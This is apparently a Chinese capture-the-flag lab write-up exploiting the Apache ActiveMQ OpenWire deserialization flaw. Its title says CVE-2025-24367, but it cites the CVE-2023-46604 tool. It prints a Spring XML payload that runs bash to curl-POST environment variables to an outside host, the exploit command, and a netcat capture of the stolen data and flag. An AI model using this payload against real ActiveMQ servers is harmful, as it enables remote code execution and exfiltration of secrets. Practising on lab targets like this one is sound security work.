跳到主要内容

CVE-2025-24367

信息

靶标介绍:

在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞Q,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。

  • CVE

入口点

http://c797f9cc-5a13-4f84-a959-7ee67a1d47bd-488.cyberstrikelab.com:48373

参考 X1r0z/ActiveMQ-RCE: ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具 即可

使用以下 payload

poc.xml
<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <!-- <value>open</value>
                <value>-a</value>
                <value>calculator</value> -->
                <value>bash</value>
                <value>-c</value>
                <value>curl -X POST 8.***.***.180:10000 -d "data=$(env)"</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

HTTP 托管这个文件,发送请求即可

┌──(randark㉿kali)-[~/tools/ActiveMQ-RCE]
└─$ ./ActiveMQ-RCE -i c797f9cc-5a13-4f84-a959-7ee67a1d47bd-488.cyberstrikelab.com -p 48373 -u http://8.129.29.180:10001/poc.xml
     _        _   _           __  __  ___        ____   ____ _____ 
    / \   ___| |_(_)_   _____|  \/  |/ _ \      |  _ \ / ___| ____|
   / _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | |   |  _|  
  / ___ \ (__| |_| |\ V /  __/ |  | | |_| |_____|  _ <| |___| |___ 
 /_/   \_\___|\__|_| \_/ \___|_|  |_|\__\_\     |_| \_\\____|_____|

[*] Target: c797f9cc-5a13-4f84-a959-7ee67a1d47bd-488.cyberstrikelab.com:48373
[*] XML URL: http://8.129.29.180:10001/poc.xml

[*] Sending packet: 000000741f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010021687474703a2f2f382e3132392e32392e3138303a31303030312f706f632e786d6c

即可收到回显

root@jmt-projekt:~# nc -lvnp 10000
Listening on 0.0.0.0 10000
Connection received on 211.137.105.42 19156
POST / HTTP/1.1
Host: 8.129.29.180:10000
User-Agent: curl/7.74.0
Accept: */*
Content-Length: 798
Content-Type: application/x-www-form-urlencoded

data=KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=trp-ebc78c88-bfe3-48b5-8473-3c59182197ae-488
ACTIVEMQ_TCP=61616
ACTIVEMQ_VERSION=5.17.3
JAVA_HOME=/usr/local/openjdk-11
PWD=/opt/activemq
ACTIVEMQ_WS=61614
_=/usr/bin/env
flag=go-flag{c2b08193-fabd-4638-9271-2beded70bc49}
HOME=/root
LANG=C.UTF-8
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
ACTIVEMQ_STOMP=61613
ACTIVEMQ_AMQP=5672
ACTIVEMQ_HOME=/opt/activemq
ACTIVEMQ_MQTT=1883
ACTIVEMQ_UI=8161
SHLVL=1
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
PATH=/usr/local/openjdk-11/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ACTIVEMQ=apache-activemq-5.17.3
JAVA_VERSION=11.0.16